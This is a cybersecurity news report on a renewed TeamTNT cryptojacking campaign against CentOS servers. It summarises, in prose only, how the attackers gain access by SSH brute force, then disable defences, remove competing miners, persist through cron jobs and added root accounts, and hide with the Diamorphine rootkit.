TeamTNT Returns: New Cryptojacking Campaign Targets CentOS Servers
The cybercriminal group TeamTNT has resurfaced, launching a new cryptojacking campaign targeting servers running the CentOS operating system. According to Group-IB, the attackers are employing brute-force SSH attacks to infiltrate virtual servers.
Once access is gained, the hackers deploy a malicious script that disables security mechanisms, deletes logs, halts competing mining processes, and hinders system recovery. Following this sequence of actions, the hackers install the Diamorphine rootkit, which conceals malicious processes and ensures remote access to the compromised hosts.
Researchers, with moderate confidence, attribute the detected attacks to TeamTNT due to the similarity of tactics and techniques seen in their previous operations. TeamTNT was first observed in 2019 conducting illegal cryptocurrency mining on cloud and container platforms. In 2021, the group announced its disbandment, yet since 2022, new attacks linked to this group have been increasingly reported.
In the latest campaign, the malicious script first scans the infected system for traces of other cryptojacking operations. It then disables security systems such as SELinux, AppArmor, and the firewall. Special attention is given to the “aliyun.service,” associated with the cloud provider Alibaba. If this service is detected, the script issues commands to remove it, freeing up resources for its own operations.
As noted earlier, the script eliminates competitors by killing processes of other miners, deleting their containers, and erasing associated images. To maintain control over the server, the attackers configure cron jobs that download updates from a remote server every 30 minutes. Additionally, they modify the SSH authorization file, adding a root account for persistent access.
To cover their tracks, the criminals alter file attributes, create administrator-access accounts, and erase command history.
The ongoing attacks by TeamTNT vividly demonstrate that a lull in cyberspace is merely an illusion. Hackers do not vanish—they evolve. Every server is a potential target, and safeguarding it requires continuous vigilance.
